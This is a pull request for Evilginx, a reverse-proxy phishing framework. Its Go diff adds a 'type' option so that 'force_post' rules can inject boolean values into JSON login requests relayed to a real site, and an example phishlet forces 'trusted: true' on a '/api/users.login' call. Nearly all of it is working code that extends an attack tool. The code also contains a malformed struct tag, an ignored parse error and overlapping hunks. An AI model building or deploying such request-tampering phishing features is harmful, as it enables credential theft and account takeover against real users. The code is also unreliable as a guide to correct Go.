### PR TITLE
added ability to force JSON parameters as boolean

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -718,40 +718,42 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 							// force post json
 							for _, fp := range pl.forcePost {
-								if fp.path.MatchString(req.URL.Path) {
-									log.Debug("force_post: url matched: %s", req.URL.Path)
-									ok_search := false
-									if len(fp.search) > 0 {
-										k_matched := len(fp.search)
-										for _, fp_s := range fp.search {
-											matches := fp_s.key.FindAllString(string(body), -1)
-											for _, match := range matches {
-												if fp_s.search.MatchString(match) {
-													if k_matched > 0 {
-														k_matched -= 1
+								if fp.tp == "json" {
+									if fp.path.MatchString(req.URL.Path) {
+										log.Debug("force_post: url matched: %s", req.URL.Path)
+										ok_search := false
+										if len(fp.search) > 0 {
+											k_matched := len(fp.search)
+											for _, fp_s := range fp.search {
+												matches := fp_s.key.FindAllString(string(body), -1)
+												for _, match := range matches {
+													if fp_s.search.MatchString(match) {
+														if k_matched > 0 {
+															k_matched -= 1
+														}
+														log.Debug("force_post: [%d] matched - %s", k_matched, match)
+														break
 													}
-													log.Debug("force_post: [%d] matched - %s", k_matched, match)
-													break
 												}
 											}
-										}
-										if k_matched == 0 {
+											if k_matched == 0 {
+												ok_search = true
+											}
+										} else {
 											ok_search = true
 										}
-									} else {
-										ok_search = true
-									}
-									if ok_search {
-										for _, fp_f := range fp.force {
-											body, err = SetJSONVariable(body, fp_f.key, fp_f.value, fp_f.tp)
-											if err != nil {
-												log.Debug("force_post: got error: %s", err)
+										if ok_search {
+											for _, fp_f := range fp.force {
+												body, err = SetJSONVariable(body, fp_f.key, fp_f.value, fp_f.tp)
+												if err != nil {
+													log.Debug("force_post: got error: %s", err)
+												}
+												log.Debug("force_post: updated body parameter: %s : %s", fp_f.key, fp_f.value)
 											}
-											log.Debug("force_post: updated body parameter: %s : %s", fp_f.key, fp_f.value)
 										}
+										req.ContentLength = int64(len(body))
+										log.Debug("force_post: body: %s len:%d", body, len(body))
 									}
-									req.ContentLength = int64(len(body))
-									log.Debug("force_post: body: %s len:%d", body, len(body))
 								}
 							}
 

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -93,10 +93,16 @@ type ProxySession struct {
 }
 
 // set the value of the specified key in the JSON body
-func SetJSONVariable(body []byte, key string, value interface{}) ([]byte, error) {
+func SetJSONVariable(body []byte, key string, value interface{}, tp string) ([]byte, error) {
 	var data map[string]interface{}
 	if err := json.Unmarshal(body, &data); err != nil {
 		return nil, err
+	}
+	switch tp {
+		case "boolean":
+			value,_ = strconv.ParseBool(value.(string))
+		default:
+			// nothing to do since the default is already 'string'
 	}
 	data[key] = value
 	newBody, err := json.Marshal(data)
@@ -737,7 +743,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									}
 									if ok_search {
 										for _, fp_f := range fp.force {
-											body, err = SetJSONVariable(body, fp_f.key, fp_f.value)
+											body, err = SetJSONVariable(body, fp_f.key, fp_f.value, fp_f.tp)
 											if err != nil {
 												log.Debug("force_post: got error: %s", err)
 											}

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -701,8 +701,8 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 			if op.Path == nil || *op.Path == "" {
 				return fmt.Errorf("force_post: missing or empty `path` field")
 			}
-			if op.Type == nil || *op.Type != "post" {
-				return fmt.Errorf("force_post: unknown type - only 'post' is currently supported")
+			if op.Type == nil || (*op.Type != "post" && *op.Type != "json") {
+				return fmt.Errorf("force_post: unknown type - only 'post' and 'json' are currently supported")
 			}
 			if op.Force == nil || len(*op.Force) == 0 {
 				return fmt.Errorf("force_post: missing or empty `force` field")

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -75,6 +75,7 @@ type ForcePostSearch struct {
 type ForcePostForce struct {
 	key   string `mapstructure:"key"`
 	value string `mapstructure:"value"`
+	tp    string `mapstructure:"type"`
 }
 
 type ForcePost struct {
@@ -189,6 +190,7 @@ type ConfigForcePostSearch struct {
 type ConfigForcePostForce struct {
 	Key   *string `mapstructure:"key"`
 	Value *string `mapstructure:"value"`
+	Type  *string `mapstructure:"type",default:"string`
 }
 
 type ConfigForcePost struct {
@@ -741,10 +743,20 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 				if op_f.Value == nil {
 					return fmt.Errorf("force_post: missing force `value` field")
 				}
+				tp := ""
+				if op_f.Type == nil {
+					tp = "string"
+				} else {
+					if *op_f.Type != "boolean" && *op_f.Type != "string" {
+						return fmt.Errorf("force_post: unknown force type - only 'boolean' and 'string' (default) are currently supported")
+					}
+					tp = *op_f.Type
+				}
 
 				f_f := ForcePostForce{
 					key:   p.paramVal(*op_f.Key),
 					value: p.paramVal(*op_f.Value),
+					tp:    p.paramVal(tp),
 				}
 				fpf.force = append(fpf.force, f_f)
 			}


### PR DESCRIPTION
Hello,

Currently, Evilginx only force posts JSON parameter values as string but it may happen that the server expects values of a certain type only (boolean in my case). I added an optional `type` parameter in the `force` section of `force_post` to be able to later cast the injected value in `SetJSONVariable`. 

For now, only booleans and strings (which is the default not to break backward compatibility) are supported but integers may be a good addition for instance. The code should be relatively simple to patch to add new types:
- add a switch case in `SetJSONVariable` and call the adequate method from strconv
- add to the condition to support other values for `*op_f.Type`

Phishlet snippet:

```
  - path: '/api/users.login'
    search:
      - {key: 'token', search: '.*'}
    force:
      - {key: 'trusted', value: 'true', type: "boolean"}
    type: 'json'
```

Current and default behavior (without `type` or `type: "string"`) - modified request (from Evilginx to remote site):

<img width="1337" alt="image" src="https://github.com/user-attachments/assets/5184d8cc-b2be-4e04-ab76-fa5630f2cd57" /><br>

Expected behavior (with snippet above) - modified request (from Evilginx to remote site):

<img width="1349" alt="image" src="https://github.com/user-attachments/assets/46b91c75-4b63-4f09-ba40-4f41715e2cfb" />
